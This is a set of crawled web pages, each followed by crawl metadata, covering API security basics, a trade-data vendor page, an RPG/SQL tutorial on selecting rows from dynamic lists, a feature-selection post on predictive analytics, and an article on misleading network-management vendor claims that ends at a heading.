Additional Reading: OWASP Top Ten
What does this mean for an SMB Owner?
“Knowledge is power” seems an appropriate maxim when it comes to API visibility. Application developers and users need to know which APIs are being published, how and when they are updated, who is accessing them, and how they are being accessed. Understanding the scope of one’s API usage is the first step toward securing them.
API access must be controlled or else it may lead to inappropriate exposure. Ensuring that the correct set of users/applications have appropriate access permissions for each API is a critical security requirement that must be coordinated with identity and access management (IAM) systems.
In some environments, as much as 90% of the respective application traffic (account login/registration, shopping cart checkout) is generated by automated bots. Understanding and managing traffic profiles, including differentiating good bots from bad ones, is necessary to prevent automated attacks without blocking legitimate traffic. Effective complementary measures include implementing whitelist, blacklist, and rate-limiting policies, CAPTCHA, and geofencing specific to use cases and their corresponding API endpoints.
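To make the rate-limiting idea concrete, here is a minimal token-bucket sketch in Python. The class name, parameters, and thresholds are illustrative assumptions rather than the API of any particular gateway product; in practice this logic runs at the API gateway or WAF layer, usually keyed per client or API key.

```python
import time

class TokenBucket:
    """Illustrative token-bucket rate limiter (hypothetical sketch,
    not drawn from any specific gateway product)."""

    def __init__(self, rate_per_sec, burst):
        self.rate = rate_per_sec        # tokens replenished per second
        self.capacity = burst           # maximum burst size
        self.tokens = float(burst)
        self.last = time.monotonic()

    def allow(self):
        # Refill tokens based on elapsed time, capped at capacity.
        now = time.monotonic()
        self.tokens = min(self.capacity,
                          self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True                 # request passes
        return False                    # request is throttled

# A client allowed 1 request/second with a burst of 3:
bucket = TokenBucket(rate_per_sec=1, burst=3)
decisions = [bucket.allow() for _ in range(4)]
```

In this sketch the first three back-to-back calls succeed and the fourth is throttled until the bucket refills, which is exactly the behavior that blunts credential-stuffing and scraping bots without affecting ordinary users.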
Vulnerability exploit prevention
APIs simplify attack processes by eliminating the web form or the mobile app, allowing a bad actor to more easily exploit a targeted vulnerability. Protecting API endpoints from business logic abuse and other vulnerability exploits is a key API security mitigation requirement.
Data loss prevention
Preventing data loss over exposed APIs for appropriately privileged users or otherwise, either due to programming errors or security control gaps, is also a critical security requirement. Many API attacks are designed specifically to gain access to critical data made available from back-end servers and systems.
It’s important to stay up to date with the tools and software your business uses. Ensure you are made aware of new vulnerabilities within your API -based infrastructure and services. Subscribing to a cybersecurity Newsletter can help you stay on top of these emerging security threats. Check out CyberHoot’s Newsletters and sign up for free monthly updates. Being aware of the security threats you face is the first step in securing your systems. | <urn:uuid:48963dd7-df27-4889-9627-f48083f3c4ec> | CC-MAIN-2022-40 | https://cyberhoot.com/cybrary/application-programming-interface-api/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00494.warc.gz | en | 0.931198 | 637 | 3.3125 | 3 |
Trade data refers to all data on domestic or international trade, broken down by country, region, industry, direction of flow (imports vs. exports), and trade-agreement partners.
Most of this data comes from governmental or international organizations such as customs agencies and EU monitors. These organizations also compile data from the reports of private companies or supply chain points, such as ports.
This data is commonly reported in columns that include monetary transactions per industry, country, and direction (imports vs exports). Tariffs and other laws and regulations affecting transactions are also very common measurements.
You will encounter industry classification codes such as the NAICS (North American Industry Classification System), or the SIC (Standard Industrial Classification) systems. If you focus on imported and exported commodities, you will instead encounter the HTS (Harmonized Tariff System) codes.
Commercial businesses, banks, investors, law firms, manufacturers, public policy makers, trade association members, and more all rely on trade data. Businesses and manufacturers use it to determine which products to create, where to market them, and how much to price them. Banks use it to find reliable borrowers while investors use it to find good investments. Law firms, international organizations, governments, and policy makers use the data to monitor local and foreign markets and to make sure that no party is being taken advantage of.
You should feel secure in using trade data from most sources: Governments and international agencies depend on accurate data to function while private companies that submit their data to governments have the strongest incentive to be as accurate as possible. Generally speaking, the difficulty lies in the size of the data.
In essence, reporting on price by volume or weight across borders, taking into account changing taxes and transportation difficulties (and, lately, coronavirus shutdowns), results in massive amounts of data even for small companies. Larger companies, or any company with international or widespread shipping or supply chains, compound that data at every pressure point. Then, depending on the size of the operations monitored, you may receive updates every hour. Thus, it is crucial for you to collect all relevant and accurate data and make sure it is constantly updated and cleaned. There are many data vendors for review on our site that provide real-time data updates and dataset cleansing for your enterprise. We recommend checking the services of the vendors linked to this page.
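As a minimal illustration of the kind of cleaning involved, the sketch below deduplicates and aggregates raw trade records by country, industry, and flow direction. The record fields and values are hypothetical; real trade feeds carry many more columns (HTS codes, tariffs, timestamps), and a naive duplicate check like this one would need refinement before dropping records in production.

```python
from collections import defaultdict

# Hypothetical raw feed: note the exact-duplicate record and mixed casing.
raw_records = [
    {"country": "US", "industry": "331", "flow": "import", "value_usd": 1200},
    {"country": "us", "industry": "331", "flow": "import", "value_usd": 800},
    {"country": "US", "industry": "331", "flow": "import", "value_usd": 1200},
    {"country": "CN", "industry": "331", "flow": "export", "value_usd": 950},
]

def clean_and_aggregate(records):
    """Normalize casing, drop exact duplicates, then sum by key."""
    seen = set()
    totals = defaultdict(int)
    for r in records:
        key = (r["country"].upper(), r["industry"], r["flow"].lower())
        fingerprint = key + (r["value_usd"],)
        if fingerprint in seen:       # exact repeat of an earlier record
            continue
        seen.add(fingerprint)
        totals[key] += r["value_usd"]
    return dict(totals)

totals = clean_and_aggregate(raw_records)
```

After cleaning, the four raw rows collapse to two aggregate totals, one per (country, industry, direction) key.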
The growth in world trade fell to only 1% last year, a decline from 4% in 2018 and 6% in 2017. That’s the fourth-worst showing in the last 40 years. That should be no surprise: the U.S. and China are the world’s two great national consumer markets. With over $4 trillion a year in combined imports, they are juicy targets for companies around the world. As they’ve started saying no to each other with higher tariffs, that has opened doors for companies in other countries to flood their markets with lower prices.
Trading Volatility’s dataset – ‘Dark Pool buying measurement of US companies and indexes – tickerized’ provides Economic Data, Legal and IP Data and Trade Data that can be used in and Portfolio Management
Topstonks’s dataset – ‘TopStonks: Social Buzz and Sentiment Data from the Most Popular Crypto Forums’ provides Stock & Market Data, Trade Data and that can be used in Algo-Trading, and Portfolio Management
Risklio’s dataset – ‘Risklio Event-Aware Trading Insights | US Stock Sentiment & Equity Market Insights’ provides Economic Data, , Stock & Market Data and Trade Data that can be used in Algo-Trading, Portfolio Management, Supplier Risk and Hedge Fund Management | <urn:uuid:5f6dce39-558d-4fbe-8ced-1f0ef51ea303> | CC-MAIN-2022-40 | https://www.data-hunters.com/category/retail_data_and_commerce_data/trade-data/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00494.warc.gz | en | 0.922337 | 766 | 2.53125 | 3 |
SQL Record Selection with Dynamic Lists
September 28, 2005 Ted Holt
SQL’s IN predicate provides an easily understood, practical way to select records (rows) of a database file (table) by comparing a field’s (column’s) value to a list of predetermined values. However, when using IN with a dynamic list, i.e., a list whose values and number of values are not specified until run time, IN has a drawback, namely that the programmer must allow for the number of values in the list in advance. This article will give you three ways to deal with dynamic lists.
But first, a brief review of the IN predicate is in order. One way to use IN is to specify a list of hard-coded literals. The following SQL query selects data for anyone whose last names are Jones, Doe, or Vine.
select cusnum,lstnam,init,city,state
  from qiws/qcustcdt
  where upper(lstnam) in ('JONES','DOE','VINE')
The query returns these rows.
CUSNUM   LSTNAM  INIT  CITY    STATE
839,283  Jones   B D   Clay    NY
392,859  Vine    S S   Broton  VT
475,938  Doe     J W   Sutter  CA
A second form of IN uses a subquery to generate the list.
select cusnum,lstnam,init,city,state
  from qiws/qcustcdt
  where upper(lstnam) in (select name from qtemp/select)
The SQL processor reads the SELECT table in library QTEMP and builds a list from the values in the NAME column.
Let’s return to ways to deal with dynamic lists. Suppose you wish to allow the user to key one or more values of some type at run time. The user might key one, two, or a dozen values, and the keyed values are used to select records from a database file. It would be nice to place a varying number of host variables in a program, but each value requires its own host variable. The following embedded SQL command allows for 12 selection values.
C/exec sql
C+ declare Input cursor for
C+ select x.* from qcustcdt as x
C+ where upper(lstnam) in
C+ (:Nam01, :Nam02, :Nam03, :Nam04,
C+  :Nam05, :Nam06, :Nam07, :Nam08,
C+  :Nam09, :Nam10, :Nam11, :Nam12)
C/end-exec
If it becomes necessary to allow for more values, more host variables must be added. If the user wishes to search for fewer than 12 names, the values in the unused host variables must not cause the search to return erroneous results. So, how can you deal with dynamic lists?
One method is to allow for a maximum number of host variables and fill the unused ones with a value that is unlikely to be stored in the database. Since a customer is unlikely to have the name !@#$%, for example, you might fill unused list elements with such a value, as in the following RPG program fragment, in which the user has entered 10 customer names.
C/exec sql
C+ declare Input cursor for
C+ select x.* from qcustcdt as x
C+ where upper(lstnam) in
C+ (:Nam01, :Nam02, :Nam03, :Nam04,
C+  :Nam05, :Nam06, :Nam07, :Nam08,
C+  :Nam09, :Nam10, :Nam11, :Nam12)
C/end-exec
C                   eval      Nam11 = '!@#$%'
C                   eval      Nam12 = '!@#$%'
A second method is to use a subquery instead of a list of host variables. Create a temporary work file into which the record selection values can be inserted. The following SQL query selects records for customers whose names are Jones, Doe, or Vine.
create table qtemp/select (name char(12))

insert into qtemp/select values ('JONES')
insert into qtemp/select values ('DOE')
insert into qtemp/select values ('VINE')

select cusnum,lstnam,init,city,state
  from qiws/qcustcdt
  where upper(lstnam) in (select name from qtemp/select)
Finally, a third method you can use is to create the list in a character string and use the LIKE predicate, rather than IN, to carry out record selection. The following RPG program accepts a list of last names in the second parameter.
 * Note: QIWS must be in the library list at compile time
 *       and at run time.
Fqsysprt   o    f  132        printer
D*entry plist
D AAA111R         pr                  extpgm('AAA111R')
D  ouStatus                      8a
D  inList                      120a   const
D AAA111R         pi
D  ouStatus                      8a
D  inList                      120a   const
D AllOK           c                   const('00-00000')
D HostStruc     e ds                  extname(QCUSTCDT)
D List            s            120a   varying
D PssrIsActive    s               n
D SqlEof          c                   const('02000')
D Status          s                   like(ouStatus)
D True            c                   const(*on)
C/exec sql
C+ set option closqlcsr=*endmod
C/end-exec
C/exec sql
C+ declare Input cursor for
C+ select x.* from qcustcdt as x
C+ where ','||:List||','
C+    like '%,'||trim(upper(lstnam))||',%'
C/end-exec
C
C                   eval      *inlr = *on
C                   eval      Status = AllOK
C                   eval      List = %trim(inList)
C/exec sql
C+ open Input
C/end-exec
C                   if        SQLStt >= SqlEof
C                   eval      Status = '10-' + SqlStt
C                   exsr      ShutDown
C                   endif
C
C                   dow       '1'
C/exec sql
C+ fetch Input into :HostStruc
C/end-exec
C                   select
C                   when      SqlStt = SqlEof
C                   leave
C                   when      SQLStt > SqlEof
C                   eval      Status = '20-' + SqlStt
C                   exsr      ShutDown
C                   endsl
C                   except    pline
C                   enddo
C
C                   exsr      ShutDown
 * =========================================================
C     *pssr         begsr
C
C                   eval      *inlr = *on
C
C                   if        PssrIsActive
C                   return
C                   endif
C
C                   eval      PssrIsActive = true
C
C                   eval      Status = '99-99999'
C                   exsr      Shutdown
C
C                   endsr
C* =============================================
C     ShutDown      begsr
C
C                   eval      *inlr = *on
C
C                   if        Status <> AllOK
C                   dump(a)
C                   endif
C
C                   if        %parms >= 1
C                   eval      ouStatus = Status
C                   endif
C
C                   return
C
C                   endsr
Oqsysprt   e            pline          1
O                       lstnam
O                       init            +0001
O                       cusnum          +0001
O                       city            +0001
O                       state           +0001
The names must be separated by commas and there must be no embedded blanks in the list. Here are some examples of such lists.
JONES
JONES,SMITH
JONES,DOE,SMITH,GREEN,WHITE
If the user enters the names Doe and Vine, and the system retrieves a record for VINE, the WHERE clause resolves to this:
where ',DOE,VINE,' like '%,VINE,%'
The system selects the record.
On the other hand, suppose the system reads the record of customer Jones. The WHERE clause resolves to this:
where ',DOE,VINE,' like '%,JONES,%'
The system does not select the record.
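The effect of wrapping both the list and the name in commas can be sketched outside SQL as well. This hypothetical Python helper mirrors the predicate `','||:List||',' LIKE '%,'||TRIM(UPPER(lstnam))||',%'` and shows why the commas prevent partial-name matches.

```python
def in_name_list(name_list, last_name):
    """Mirror of the SQL predicate used above: wrap both sides in
    commas so only whole, comma-delimited entries can match."""
    haystack = ',' + name_list.upper() + ','
    needle = ',' + last_name.strip().upper() + ','
    return needle in haystack

print(in_name_list('DOE,VINE', 'Vine'))      # selected
print(in_name_list('DOE,VINE', 'Jones'))     # not selected
print(in_name_list('JONESON,DOE', 'Jones'))  # no false match on JONESON
```

Without the surrounding commas, the third check would wrongly match the customer Jones against the list entry JONESON; the delimiters are what make the LIKE trick safe.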
Now you have three ways to use dynamic lists of unpredictable sizes in embedded SQL. Since selection from lists allows you to give the user powerful and flexible report and inquiry programs, these techniques are worth mastering. | <urn:uuid:56b68b8f-ea21-4d50-9547-cacb0a89fcfe> | CC-MAIN-2022-40 | https://www.itjungle.com/2005/09/28/fhg092805-story02/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00494.warc.gz | en | 0.771092 | 1,718 | 2.515625 | 3 |
Will they? Won't they? - Use Artificial Intelligence to predict customer behaviour!
by Dr. Shashi Barak, on Jun 6, 2019 8:14:00 PM
Estimated reading time: 3 mins
As enterprises strive to increase their market share and stay ahead in a competitive business environment, they increasingly need to turn to technology. Predictive Analytics is a technology that studies the behavior of existing and potential customers, through social media channels and their online website activities, to predict future scenarios and customers’ probability of purchase.
Processing the gathered information to extract key features, including essential patterns and attributes, and selecting only the most appropriate features helps to create a simple yet powerful predictive model. Predictive Analytics has helped Amazon increase its sales by 30%. As per a report from McKinsey, predictive maintenance helps reduce call-center costs by approximately 20-50%.
What is Predictive Analytics?
Predictive analytics encompasses a variety of statistical techniques from data mining, predictive modelling, and machine learning, which analyze current and historical facts to make predictions about future or otherwise unknown events.
How to create a powerful Predictive Model?
A highly effective model is built using a minimal set of features, which contain enough information to train a model to make accurate predictions/classifications.
The selection of useful features out of N given features is quite complex. Mathematically, there are 2^N possible subsets. For example, a problem with 20 features has 2^20 = 1,048,576 possible subsets, so one can easily imagine the complexity of dealing with 40 features.
To avoid the computational burden, the number of selected input variables should not be too high. Nor should it be too low, as the input variables would then fail to provide the essential information.
To build an efficient model, the number of selected features should be optimal, so that the behavior of the given phenomenon can be described with a minimum of non-redundant, informative variables.
Feature selection methods:
Feature selection methods can be categorized into three categories: filters, wrappers, and embedded methods.
- Filter method: In filter methods, a numerical index is obtained for each variable using a statistical test such as Pearson’s correlation coefficient, information gain, mutual information, or maximum relevance. Generally, the variables with the highest index values are selected. If two features contain the same information, one can be removed using correlation, mutual information, or some other criterion.
- Wrapper method: The wrapper method uses the actual prediction/classification algorithm to build a model with a subset of features and then evaluates its performance. It tries different subsets of features, and the subset for which the model shows the best performance is selected. One drawback of this approach is that it is computationally very expensive.
- Embedded method: Unlike filter and wrapper methods, embedded methods integrate feature selection into the model training itself: features are selected as part of model generation.
The main difference between the embedded and wrapper methods is that embedded methods iteratively update the model parameters and the feature set together according to model performance, whereas the wrapper method judges a candidate feature set only by the performance of the model built from it.
Why is the Wrapper approach preferred over the Filter and Embedded methods?
Suppose we have 26 features, a, b, c, d, ..., z. Each individual attribute may not be informative by itself, but a combination of them may be (for example, b and c may carry no information separately, while b + c or b*c might). A filter approach may miss this because it evaluates features in isolation rather than in combination, but a wrapper approach can capture it because it evaluates each subset with the actual prediction or classification algorithm.
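A toy experiment (hypothetical data, pure Python) makes this point concrete: with y = x1 XOR x2, each feature alone scores no better than chance under a per-feature filter score, while an exhaustive wrapper search over subsets finds the pair immediately.

```python
from itertools import combinations, product

# Truth table for y = x1 XOR x2, with x3 as an irrelevant noise feature.
rows = [((x1, x2, x3), x1 ^ x2) for x1, x2, x3 in product((0, 1), repeat=3)]

def accuracy(feature_idxs):
    """Score a feature subset by building a lookup 'model' on those
    features and measuring majority-vote accuracy (ties default to 0)."""
    table = {}
    for x, label in rows:
        key = tuple(x[i] for i in feature_idxs)
        table.setdefault(key, []).append(label)
    correct = 0
    for x, label in rows:
        labels = table[tuple(x[i] for i in feature_idxs)]
        majority = 1 if labels.count(1) * 2 > len(labels) else 0
        correct += (majority == label)
    return correct / len(rows)

# Filter-style view: each feature in isolation looks useless (accuracy 0.5).
single_scores = {i: accuracy((i,)) for i in range(3)}
# Wrapper-style search: evaluate every subset with the actual model.
subsets = [s for r in (1, 2, 3) for s in combinations(range(3), r)]
best = max(subsets, key=accuracy)
print(single_scores)          # each feature alone scores 0.5
print(best, accuracy(best))   # the pair (0, 1) scores 1.0
```

The exhaustive search is exactly why the wrapper approach is expensive: here it tries all 2^3 - 1 = 7 subsets, and the count doubles with every added feature.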
To sum up, the optimal set of features should contain the minimum number of input variables required to describe the behavior of the considered system or phenomenon, with minimum redundancy and maximum information. If the optimal set of input variables is identified, a more accurate, efficient, simple, and easily interpretable model can be built.
The rule of thumb followed for feature selection across analytics is to use the Filter method when the number of features in the dataset is large and the Wrapper method when the number of features is moderate. In practice, however, it is usually better to use the Wrapper method for key feature selection, because it takes into account the performance of the actual classifier you want to use, and different classifiers vary widely in how they use information.
Using these simple, yet powerful techniques to build a predictive model, enterprises can improve their sales and OpEx figures and stay ahead in a globally competitive business environment. | <urn:uuid:1e9023bd-cc19-4861-868b-9d60c10aa72a> | CC-MAIN-2022-40 | https://blog.datamatics.com/identify-key-predictors-and-influencers-for-predicting-customer-behavior-by-using-artificial-intelligence | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00494.warc.gz | en | 0.909384 | 984 | 2.953125 | 3 |
Network management usually refers to the broad subject of managing computer networks using a wide variety of software and hardware products. This article analyzes and ranks the top 10 issues and misrepresentations IT managers consistently encounter in managing their networks.
Simple Network Management Protocol (SNMP) is Simple
This ranks as the number one deception in the industry. SNMP is by no means simple for even a seasoned network engineer. In theory, it is a simple protocol that governs how management data is retrieved and processed from network devices by a Network Management System (NMS) and how these network devices send management information back to an NMS. Getting useful and meaningful data for your NMS via SNMP is the real challenge and is where most vendors distort their capabilities and unfortunately, deceive their potential clients.
Most network management vendors claim to be SNMP-capable. What they don't tell you is that what they really offer is simple SNMP GET requests, which ask a network device to return the current value of a specific object identifier (OID), such as “packets IN.” This simplistic polling yields data such as: packets in = 5,992. What can you do with this information? Not much, of course.
A true NMS assembles appropriate OID values into meaningful statistics like Bandwidth Utilization. Most vendors won't be honest and explain their SNMP limitations accurately. The statistic Bandwidth Utilization is not a single OID object, as many vendors will have you believe. The actual statistic is created by using the formula: ((IN pkts in Octets + OUT pkts in Octets) * 8) / 1024. Many vendors will say they can provide statistics like Bandwidth Utilization, but in truth, they leave it up to you to figure out which OIDs you need and how to perform the appropriate mathematics. Be sure to see this functionality fully demonstrated to avoid being misled.
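The arithmetic can be sketched in a few lines. The first function implements the article's formula verbatim; the second, interval-based utilization function and the sample counter values are illustrative assumptions layered on top, reflecting the common practice of working on counter deltas divided by link speed.

```python
# Throughput per the article's formula: ((IN octets + OUT octets) * 8) / 1024.
def throughput_kbits(in_octets, out_octets):
    return (in_octets + out_octets) * 8 / 1024

# In practice an NMS polls the counters twice and works on the delta over
# the polling interval, dividing by link speed for a percentage; this
# variant is an assumption, not part of the article's formula.
def utilization_pct(delta_in, delta_out, interval_s, if_speed_bps):
    return (delta_in + delta_out) * 8 * 100 / (interval_s * if_speed_bps)

print(throughput_kbits(5992, 4008))                           # 78.125
print(utilization_pct(1_250_000, 1_250_000, 10, 10_000_000))  # 20.0
```

A 10 Mbit/s link moving 2.5 MB in a 10-second interval comes out at 20% utilized, which is the kind of actionable number raw OID polling never gives you.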
To take protective measures a step further, ask your vendor to provide vendor-specific statistics that are important in your infrastructure. If you don't know what is important, it may be that you'll never be able to fully implement this powerful monitoring capability. Unless you are a programmer or SNMP expert, be sure to look for an NMS that has the statistics you are looking for already built in.
The difference between SNMP Polling and SNMP Monitoring can be illustrated below:
SNMP Polling is the process of a network management station (NMS) sending or “polling” SNMP GET requests to the remote device. In other words, it asks the device for information and the device responds with a value. SNMP Monitoring is when the network device is configured to send SNMP traps (messages) to an NMS without a specific request.
The problem is, as with most network monitoring information, there may be many, many trap messages and they are usually cryptic in raw form.
Example Raw SNMP Trap:
“9/13/2002 9:39:8 : grtse38;grtse38;enterprises.188.8.131.52;6;.9002;
enterprises.184.108.40.206.1001.0 = 0 enterprises.220.127.116.11.1003.0 = 0
enterprises.18.104.22.168.1004.0 = 1 enterprises.22.214.171.124.1005.0 =
“ONLINE” enterprises.126.96.36.199.1006.0 = “FAILED”
This message by itself does not produce useful information that is actionable by the network administrator. The network management product must accept this message, simultaneously link its contents to a Management Information Base (MIB) definition file, then convert it to a useful message such as, “Server1 PowerSupply 1 FAILED.” Claiming to monitor SNMP traps without doing MIB lookups and message conversion wouldn't qualify as a feature for most users. In addition, you may also desire specific integration with some of the most common and useful SNMP trap producers such as Compaq (HP) Insight Manager, Dell OpenManage® and IBM Director®.
Root Cause Analysis
This “feature” means different things to different vendors and places #2 on our list. Delivering true Root Cause Analysis means that your NMS can filter through hundreds (or thousands) of events and point you directly to the root cause of either an outage or performance degrading event – a very tall order.
To separate fact from fiction in this area, we generally like to separate monitoring capabilities into three categories: Component Monitoring, Transaction Monitoring and Event Correlation.
True Component Monitoring means that your NMS is capable of three distinct functions. These include the ability to:
1. Monitor all of the individual “moving parts” of your application across all of the devices and software on which it depends.
2. Understand and group the relationship of these components.
3. Represent those components as a single view of your application.
Many NMSs boast about the number of “monitors” they have and their ability to monitor various devices within your network. With these capabilities, the claim is often made that these NMSs have the ability to provide Component Monitoring and as an end result, Root Cause Analysis. Unfortunately, without #2 and #3 above, the closest you will come to root cause identification is several individual component alarms that are not correlated to other events, or to your specific application.
Often, you won't know which event came first and what chain reactions were caused.
Transaction Monitoring requires that your NMS have the ability to create actual or synthetic user transactions to exercise every component of an application end-to-end. While Component Monitoring is powerful and valuable, Transaction Monitoring provides a more holistic view from the user's perspective and ensures that even unknown components are exercised.
Two examples would be email and Web Transactions probes. An email probe creates, sends, receives and measures email packets out of and back into your network, assuring that email is flowing properly. This mechanism is sure-fire and enables you to rest easier knowing this critical app is functioning properly. If a problem does occur, a true Transaction Monitor can provide accurate root cause identification by specifying which component failed or is causing performance degradation.
Event Correlation is the ability to intelligently correlate storms of events with the outcome being the display of the true root cause. Many times, this functionality is designed to suppress the “noise” so that you can see the root cause more clearly. Event Correlation can be achieved via any of the following mechanisms by:
Service Group: For example, if a Critical alarm occurs on any item in a service group, all following alarms can be correlated into a single event.
Topology: Alarms can be correlated by manually or auto-discovered Layer 2 or Layer 3 network topology or via Dependency Maps.
Host: Multiple alarms from a single device are consolidated into a single event.
Domain: Multiple alarms from a logical domain are consolidated into a single event.
IF-THEN manual rules creation and scripting.
Automated or manually created dependency maps.
Above all, one of the newest breakthroughs in Root Cause Analysis is to provide real-time anomaly detection. In order to detect anomalies, your NMS must have collected sufficient data profiling your network's behavior. Deviations and anomalies in that behavior are then automatically detected and displayed to deliver rapid root cause identification.
Availability Monitoring and Reporting
Ranking #3 on our list of network management lies is Availability Monitoring and Reporting. Most NMS products claim to monitor for availability. This is a blanket statement that must be carefully inspected.
Today's applications and networks are more complex than ever. Determining application availability is almost always more involved than the mechanisms claimed to monitor it. The primary mechanism used by most NMS products to determine device availability is the trusty ICMP ping. If a device responds to ping, it is assumed that the device is available.
There are many problems with this assumption. First, a device may be responding to ping, but the application may very well be down for any number of reasons. Simple examples include: application services stopped on a server (server is not down but is responding to ping), application ports are blocked by a firewall (pings are allowed, a specific port is not). So, if your NMS is monitoring for availability using ICMP ping as its sole mechanism, be prepared for disappointment.
A true NMS solves the complex issue of availability monitoring and accuracy by building in the ability to specify which events are 'availability affecting.' This is a very powerful capability because it transcends the traditional event category limitations of Critical, Major, Minor, Warning and Information. In most NMSs, Critical simply means “needs immediate human intervention.” Some Critical events may be 'availability affecting,' others not. For example, if one power supply in a server fails and the redundant power supply takes over, this may generate a Critical event even though it has not yet affected availability. However, if both power supplies fail, then you have a definitive 'availability affecting' event.
Availability Reporting suffers the same problem in most NMSs, reporting only whether or not a device has responded to ping. Some NMSs use the “uptime” feature built into operating systems to provide their availability reports. This method is flawed as well because it doesn't account for planned or scheduled downtimes such as voluntary reboots.
SLA Monitoring, Measurement and Reporting
True SLA management is indeed an advanced and sophisticated subject. In order to truly manage SLAs, your NMS must have the ability to establish performance baselines, deliver accurate availability results and have a way to measure improvements or results against the SLA.
In order to manage in accordance with an SLA, your NMS must enable users to organize services as they are defined within the SLA. If you are confined to a single view or a device centric view, it may not be possible to organize your monitored objects in a way that matches your SLA.
Next, your NMS must have the ability to set an SLA score. This would be your perfect score if you indeed met your SLA requirements. Any events that are SLA affecting would then be subtracted from your SLA score providing you with real measurements of SLA compliance. Using this real SLA management mechanism, IT managers can honestly measure and improve their results against real world SLAs.
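The scoring mechanism can be sketched in a few lines; the perfect score of 100 and the per-event penalty weights are hypothetical values for illustration, not figures from any particular product.

```python
# Start from a perfect score and subtract a penalty for each
# SLA-affecting event seen during the measurement period.
PERFECT_SCORE = 100.0
PENALTIES = {"outage": 5.0, "degradation": 1.0}   # assumed weights

def sla_score(events):
    return PERFECT_SCORE - sum(PENALTIES.get(kind, 0.0) for kind in events)

print(sla_score(["outage", "degradation", "degradation"]))  # 93.0
```

Events that are not SLA-affecting carry no penalty, which is exactly the distinction between Critical events and 'availability affecting' events made earlier.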
Lastly, any good SLA engine should be “service window aware.” This means you have the ability to define hours of operation for critical apps, and conversely planned maintenance and outage windows. Not having this feature makes it difficult, if not impossible, to provide accurate SLA measurements and reports.
Capacity Planning and Analysis
In order to provide Capacity Planning and Analysis, your NMS has to have the following capabilities:
Ability to collect historical data
Ability to use and analyze historical data to provide accurate forecasts and predictions of future behavior
The first requirement means that you need to be collecting data in a relational database. If the proposed NMS does not use a relational database, it is certain that you will have minimal data collection, storage and reporting capabilities.
The second requirement is more advanced. Once data is stored in a database, what your NMS can do with that data is where you find true value. Raw data is useless; information is valuable. A good NMS turns your raw data into valuable, time-saving and reliable information. Better NMSs use sophisticated mathematical probability and statistical algorithms to provide accurate trend analysis for reliable forecasts and planning.
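As a minimal sketch of trend analysis over collected data, a least-squares line fit to historical utilization samples can extrapolate future demand. The sample figures are invented, and a real NMS would use far richer models than a straight line.

```python
# Fit y = intercept + slope * x by ordinary least squares and extrapolate.
def linear_forecast(samples, periods_ahead):
    n = len(samples)
    xs = range(n)
    mean_x = sum(xs) / n
    mean_y = sum(samples) / n
    slope = (sum((x - mean_x) * (y - mean_y) for x, y in zip(xs, samples))
             / sum((x - mean_x) ** 2 for x in xs))
    intercept = mean_y - slope * mean_x
    return intercept + slope * (n - 1 + periods_ahead)

monthly_util = [41, 44, 46, 50, 53, 55]   # % bandwidth utilization, by month
print(round(linear_forecast(monthly_util, 6), 1))   # ~72.7% six months out
```

With six months of samples climbing roughly 3% per month, the fitted trend warns that the link will be near saturation within a year, which is the kind of forecast capacity planning is about.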
Easy-to-Use
All vendors claim their products are easy to use and configure. They all look good during the demo and all seem like they are easy to implement. Of course, this is why “Easy-to-Use” ranks #6 on our list. There are many different areas where this claim usually becomes fictitious. Be on the lookout for these “features” as sometimes direct indicators that the product will not be easy to use or configure:
100% Agentless. While this one sounds good, it really is a dishonest claim. Agentless implies that there is no software to install and that the product is therefore easier to deploy, manage and maintain. Sounds reasonable. Of course, the devil is in the details. There is no truly “agentless” product.
The proposed NMS simply uses the “agents” that come with another vendor's product instead, such as Windows' Host MIB or WMI services agent. The Host MIB is not enabled by default in Windows 200x; you have to configure it manually, which takes over 30 steps. So, perhaps you don't have to install a proprietary agent, but you do have to turn on and implement someone else's. This can cause more problems than the ones it purports to solve.
Monitors or Agents for Specific Applications. Having monitors or agents for specific apps usually means that you have to install one or more agents on a remote host. This can create a management and maintenance headache and impose performance degradation on the remote hosts. Look for an NMS that combines the best of both agent and agentless approaches and has a low-impact host agent.
Central Event Store or Consolidated Event Viewer. This means that your NMS collects all raw events (98% of which you don't need) into a centralized database, causing unnecessary network traffic overload and processing problems. You are then left to learn and write complex rules and filters to find the useful events, a task that is typically the #1 reason NMS projects are abandoned or considered failures.
Service Management
One of the hot buzzwords in IT today is “service management.” It refers to managing applications and infrastructure as end-to-end services from the client's perspective, moving away from the device-centric approach. Today's complex applications rely upon a multitude of protocols and devices which have to work seamlessly together. They then have to do so in a world of increasingly tight security, adding a whole new dimension of complexity and potential troubleshooting pitfalls. True Service Management will enable you to view an application as its packets flow through your network, almost like watching water flow through a plumbing system. The challenge of Service Management in networks is that the pipes carry a diverse payload consisting of several different fluids.
Your NMS must enable you to create multiple views of your infrastructure as well as one that accurately represents your services. For example, your core router carries all of your traffic. To accurately represent your Customer Relationship Management (CRM) service, you would need to create a view that monitors only your CRM traffic flowing through your router and nothing else. This can't be an exclusive feature. You must be able to set this up for all of your services and view them accordingly. To continue the example, your Service View might include the application services on a particular set of Windows servers, TCP ports on your firewall and perhaps objects in a specific database instance.
Plug and Play Installation
Apparently, “Plug and Play” means different things to different NMS vendors. To most of us, this means that a product we buy is up and running with minimal configuration, in a matter of minutes or hours. If we have to hire expensive consultants and spend weeks or months implementing and learning the product, it is not “plug and play.” Ask your vendor for references on how long it took to implement the product, how much daily consultants cost and what they mean by “plug and play.”
Top warning signs that an NMS product cannot be “Plug and Play” include the following:
More than 200 systems integration companies exist to implement and configure their product.
Daily consulting rates for their product are higher than any normal consulting rate, typically 2x or 3x normal consulting rates.
Numerous third party products exist to enhance the functionality.
100% Web-Based
